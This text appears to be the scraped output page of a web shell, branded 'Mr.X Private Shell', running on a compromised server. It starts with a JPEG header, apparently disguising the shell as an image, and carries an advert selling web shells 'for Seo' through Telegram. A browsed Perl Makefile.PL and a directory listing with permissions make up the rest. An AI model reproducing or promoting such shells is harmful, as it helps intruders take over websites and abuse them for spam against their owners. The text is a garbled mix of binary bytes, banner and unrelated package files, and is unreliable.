����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
use strict;
use warnings;
use ExtUtils::MakeMaker;
WriteMakefile(
NAME => 'File::Copy::Recursive',
VERSION_FROM => 'lib/File/Copy/Recursive.pm',
ABSTRACT_FROM => 'lib/File/Copy/Recursive.pm',
AUTHOR => 'Daniel Muey <http://drmuey.com/cpan_contact.pl>',
LICENSE => 'perl_5',
PREREQ_PM => {
'File::Copy' => 0,
'File::Spec' => 0,
'File::Glob' => 0,
'Cwd' => 0,
},
TEST_REQUIRES => {
'Test::More' => '0.88',
'Test::Deep' => 0,
'Test::File' => 0,
'File::Temp' => 0,
'Test::Warnings' => 0,
'Path::Tiny' => 0,
'Test::Fatal' => 0,
},
META_ADD => {
'meta-spec' => { version => 2 },
dynamic_config => 0,
resources => {
repository => {
url => 'https://github.com/drmuey/p5-File-Copy-Recursive.git',
web => 'https://github.com/drmuey/p5-File-Copy-Recursive',
type => 'git',
},
bugtracker => {
web => 'https://github.com/drmuey/p5-File-Copy-Recursive/issues',
},
},
},
);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| t | Folder | 0755 |
|
|
| Changes | File | 7.7 KB | 0644 |
|
| MANIFEST | File | 305 B | 0644 |
|
| META.json | File | 1.6 KB | 0644 |
|
| META.yml | File | 881 B | 0644 |
|
| MYMETA.json | File | 1.69 KB | 0644 |
|
| MYMETA.yml | File | 979 B | 0644 |
|
| Makefile | File | 31.52 KB | 0644 |
|
| Makefile.PL | File | 1.19 KB | 0644 |
|
| README | File | 987 B | 0644 |
|
| README.md | File | 624 B | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|